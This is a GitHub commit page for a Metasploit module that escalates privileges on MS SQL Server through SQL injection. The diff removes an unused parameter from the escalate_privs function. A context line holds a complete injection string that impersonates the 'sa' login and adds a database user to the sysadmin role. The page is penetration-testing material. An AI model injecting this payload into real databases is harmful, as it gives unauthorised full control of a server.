Skip to content

Commit 00dbcc1

Browse files
nullbindnullbind
committed
Removed imp_user var from escalate_privs func
1 parent 5bebabb commit 00dbcc1

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -190,7 +190,7 @@ def check_imp_sysadmin(imp_user_list)
190190
end
191191

192192
# Attempt to escalate privileges
193-
def escalate_privs(imp_user,db_user)
193+
def escalate_privs(db_user)
194194

195195
# Setup Query - Impersonate the first sysadmin user on the list
196196
evil_sql = "1;EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember '#{db_user}','sysadmin';Revert;--"

0 commit comments

Comments
 (0)